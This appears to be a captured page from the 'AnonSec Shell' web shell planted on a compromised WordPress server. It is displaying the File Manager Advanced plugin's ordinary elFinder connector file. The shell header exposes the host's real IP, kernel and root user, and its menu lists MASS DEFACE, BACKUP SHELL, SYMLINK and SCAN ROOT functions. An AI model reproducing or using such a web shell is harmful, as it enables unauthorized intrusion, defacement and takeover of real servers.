AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 18.225.72.92   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/chroot/var/www/wp-content/plugins/file-manager-advanced/application/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/chroot/var/www/wp-content/plugins/file-manager-advanced/application/class_fma_connector.php
<?php
/*
@package: File Manager Advanced
@Class: fma_connector
*/
if(class_exists('class_fma_connector')) {
	return;
}
class class_fma_connector
{
  // elfinder defaults:
  //read:https://github.com/Studio-42/elFinder/wiki/Connector-configuration-options
	public function fma_local_file_system() {
		$settings = get_option('fmaoptions');
		$path = ABSPATH;
		if(isset($settings['public_path']) && !empty($settings['public_path'])) {
			$path = $settings['public_path'];
		}
        $url = site_url();
		if(isset($settings['public_url']) && !empty($settings['public_url'])) {
			$url = $settings['public_url'];
		}
         if(isset($settings['hide_path']) && ($settings['hide_path'] == '1')) {
            $url = '';
         }
		    require 'library/php/autoload.php';
    if(isset($settings['enable_trash']) && ($settings['enable_trash'] == '1')) {
			$trash = array(
			'id'            => '1',
			'driver'        => 'Trash',
			'path'          => FMAFILEPATH.'application/library/files/.trash/',
			'tmbURL'        => site_url() . '/application/library/files/.trash/.tmb/',
			'winHashFix'    => DIRECTORY_SEPARATOR !== '/', // to make hash same to Linux one on windows too
			'uploadDeny'    => array(''),                // Recomend the same settings as the original volume that uses the trash
			'uploadAllow'   => array('all'),// Same as above
			'uploadOrder'   => array('deny', 'allow'),      // Same as above
			'accessControl' => 'access',                    // Same as above
			'attributes' => array(
				array(
						  'pattern' => '/.tmb/',
						  'read' => false,
						  'write' => false,
						  'hidden' => true,
						  'locked' => false
						 ),
				array(
						  'pattern' => '/.quarantine/',
						  'read' => false,
						  'write' => false,
						  'hidden' => true,
						  'locked' => false
				),
				array(
					'pattern' => '/.gitkeep/',
					'read' => false,
					'write' => false,
					'hidden' => true,
					'locked' => false
		      )
			 )
		);		
		$trash_f = 't1_Lw';
	} else {
		$trash = array();
		$trash_f = '';
	}
	$hide_htaccess = array(
		'pattern' => '/.htaccess/',
		'read' => false,
		'write' => false,
		'hidden' => true,
		'locked' => false
	);	
	if(isset($settings['enable_htaccess']) && !empty($settings['enable_htaccess']) && $settings['enable_htaccess'] == '1') {
		$hide_htaccess = array();
    }
	// getting allowed upload
	$allowUpload = array('all');
	if(isset($settings['fma_upload_allow']) && !empty($settings['fma_upload_allow'])) {
		$allowUpload = explode(',',$settings['fma_upload_allow']);
    }
    // restricting max upload size
	$max_upload_size = isset($settings['upload_max_size']) ? $settings['upload_max_size']  : '0';

				$opts = array(
				'roots' => array(
					// Items volume
					array(
						'driver'        => 'LocalFileSystem',           // driver for accessing file system (REQUIRED)
						'path'          => $path,                 // path to files (REQUIRED)
						'URL'           => $url, // URL to files (REQUIRED)
						'trashHash'     => $trash_f,                     // elFinder's hash of trash folder
						'winHashFix'    => DIRECTORY_SEPARATOR !== '/', // to make hash same to Linux one on windows too
						'uploadDeny'    => array('all'),                // All Mimetypes not allowed to upload
						'uploadAllow'   => $allowUpload,// Mimetype `image` and `text/plain` allowed to upload
						'uploadOrder'   => array('deny', 'allow'),      // allowed Mimetype `image` and `text/plain` only
						'disabled'      => array('help','preference'),
						'accessControl' => 'access',               
						'acceptedName'  => 'validName',
						'uploadMaxSize' => $max_upload_size, 
						'attributes' => array(
											   array(
														 'pattern' => '/.tmb/',
														 'read' => false,
														 'write' => false,
														 'hidden' => true,
														 'locked' => false
														),
											   array(
														 'pattern' => '/.quarantine/',
														 'read' => false,
														 'write' => false,
														 'hidden' => true,
														 'locked' => false
											   ),
											   array(
												'pattern' => '/.gitkeep/',
												'read' => false,
												'write' => false,
												'hidden' => true,
												'locked' => false
											   ),
											   $hide_htaccess
											)
					),
					$trash
					// Trash volume

				)
       );
// run elFinder
$fmaconnector = new elFinderConnector(new elFinder($opts));
$fmaconnector->run();
die;
}
public function access($attr, $path, $data, $volume, $isDir, $relpath) {
	$basename = basename($path);
	return $basename[0] === '.'                  // if file/folder begins with '.' (dot)
			 && strlen($relpath) !== 1           // but with out volume root
		? !($attr == 'read' || $attr == 'write') // set read+write to false, other (locked+hidden) set to true
		:  null;                                 // else elFinder decide it itself
}
}

Anon7 - 2022
AnonSec Team